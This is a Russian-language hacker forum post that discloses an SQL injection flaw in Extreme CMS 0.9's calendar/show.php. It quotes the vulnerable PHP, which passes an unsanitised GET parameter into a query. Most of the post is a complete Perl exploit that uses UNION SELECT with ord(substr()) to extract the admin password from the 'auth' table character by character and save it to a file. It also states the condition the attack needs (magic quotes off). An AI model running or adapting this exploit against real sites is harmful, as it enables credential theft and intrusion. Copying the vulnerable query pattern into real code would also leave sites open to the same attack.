26.11.2009, 21:45
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами:
9428066
Репутация:
1668
|
|
Extreme CMS 0.9 SQL Injection Exploit
Extreme CMS 0.9
SQL Injection
Vuln file: /calendar/show.php
PHP код:
... ... ... ... ...
$id = $_GET['event']; // from clicked day
$sho = $_GET['sho']; // display method
$query = "SELECT * FROM calendar WHERE id = '$id' "; // retrieves ONE record
$result = mysql_query($query);
$myrow = mysql_fetch_array($result);
$ev_1 = $myrow['ev_dat']; // is date for that record (allows multiple events selection)
$found = $myrow['ev_dat'];
$pieces = explode("-", $ev_1);
$monum = intval($pieces[1]);
$query = "SELECT * from calendar WHERE ev_dat = '$ev_1' "; // retrieves ALL date matches
$result = mysql_query($query);
echo"<table width='480' 'cellpadding='3' cellspacing='3' align='center' style='border: thin dotted #cccccc;' bgcolor='#f7f7f7'><tr><td>";
echo "<h2>". $mo[$monum]. " ". intval($pieces[2]). ", ". intval($pieces[0]). "</h2>";
... ... ... ... ...
Не какой фильтрации входящих данных нет. Есть одно но... результат sql запроса обрабатывается intval'ом.
Для обхода intval (если это можно назвать обходом  ) и упрощения вывода написал эксплойт
Exploit:
Код:
#!/usr/bin/perl
#-----------------------------------------
# Extreme CMS 0.9 SQL Injection Exploit
#-----------------------------------------
# Download Script : http://sourceforge.net/projects/extremecms
#
# Author : RulleR aka Pin4eG
# Contact : rull3rrr[at]gmail[dot]com
# Visit : forum.antichat.ru
#-----------------------------------------
use LWP;
use Fcntl;
#________________ CONFIG _______________
$vuln = '/calendar/show.php?event=';
$length = 40;
$column_name = 'password';
$table_name = 'auth';
$id = 1; # user id
$regexp = '<h2> 0, (.*)<\/h2>';
$filename = 'Exp_result.txt';
#_______________________________________
$title = "
[*]==================================[*]
! !
! Extreme CMS SQL Injection Exploit !
! !
! Found && coded by RulleR !
! !
[*]==================================[*]
";
print $title;
print "\n[+] Enter Host: ";
chop ($host = <>);
print "\n[>] Exploiting started... $host\n";
for ($start = 1; $start<=$length; $start++) {
$inj = '-1%27+union+select+null,ord(substr((select+'.$column_name.'+from+'.$table_name.'+where+id='.$id.'),'.$start.',1)),null,null,null+--+';
$req = $host.$vuln.$inj;
$cont = &WebGet($req);
$cont =~ /$regexp/;
last if (!$1);
$char = chr($1);
push (@res, $char);
}
print "\n------------- [Result] --------------\n";
print @res;
print "\n-------------------------------------\n";
print "\n[!] Exploiting finished :)\n";
sysopen (RESULT, $filename, O_WRONLY | O_CREAT);
print RESULT $title;
print RESULT "\n------------- [Result] --------------\n";
print RESULT @res;
print RESULT "\n-------------------------------------\n";
close (RESULT);
print "\nResult saving in $filename\n";
sub WebGet() {
$url = $_[0];
$request = HTTP::Request->new(GET => $url);
$u_a = LWP::UserAgent->new();
$u_a->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$u_a->timeout(5);
$response = $u_a->request($request);
if ($response->is_error) {
print " ! Error: ".$response->status_line.".\n"; die " :(\n";
}
return $response->content;
}
securityreason.com
Для успешной эксплуатации необходимо:
magic quotes = Off
© RulleR aka Pin4eG
|
|
|